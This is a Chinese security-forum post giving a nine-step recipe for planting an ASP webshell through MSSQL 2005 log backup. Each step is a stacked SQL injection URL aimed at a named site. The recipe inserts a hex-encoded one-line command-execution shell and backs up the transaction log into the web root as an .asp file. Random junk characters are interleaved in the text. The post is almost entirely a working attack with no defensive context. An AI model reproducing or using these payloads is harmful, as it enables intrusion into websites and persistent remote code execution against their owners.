中国网络渗透测试联盟

标题: Mssql2005 Log备份Webshell [打印本页]

---

作者: admin    时间: 2012-9-15 14:25
标题: Mssql2005 Log备份Webshell
第一步
: {& k; L+ ?" v8 e+ ohttp://itpro.blog.163.com/test.asp';alter/**/database/**/[netwebhome]/**/set/**/recovery/**/full[/url]--

第二步：
$ C" V$ o! J/ q" g$ p, ^' k8 Ghttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/database/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

! `0 r/ W, i' G5 m# p# ~第三步
& {( L# q% R) y. v& H0 Vhttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--

! p# ^, ~! N1 ]3 u1 f# F: A: k第四步
! p1 t& _9 k; v( X8 Qhttp://itpro.blog.163.com/test.asp';create/**/table/**/[itpro]([a]/**/image)--

第五步
http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第六步
http://itpro.blog.163.com/test.asp';insert/**/into/**/[itpro]([a])/**/values(0x3C254578656375746528726571756573742822697470726F222929253E)--

$ F" C1 P$ T# `3 q5 D第七步
. {% H8 V' ^0 a, R$ M: ~http://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%0x64003A005C007700770077005C0077007700770072006F006F0074005C0077006F0077005C006C006500660074002E00610073007000/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--

第八步
  o  K) l- W& _9 x9 M! G* D' Ghttp://itpro.blog.163.com/test.asp';drop/**/table/**/[itpro]--

2 |$ j( A  \! P. ?0 _7 S2 h; b4 r" x1 g第九步
; h+ L7 j: G5 g# C3 W# rhttp://itpro.blog.163.com/test.asp';declare/**/@d/**/nvarchar(4000)/**/select/**/@d%3D0x640062006200610063006B00/**/backup/**/log/**/[netwebhome]/**/to/**/disk%3D@d/**/with/**/init--
. e# q6 l% n  g

---

欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/)

Powered by Discuz! X3.2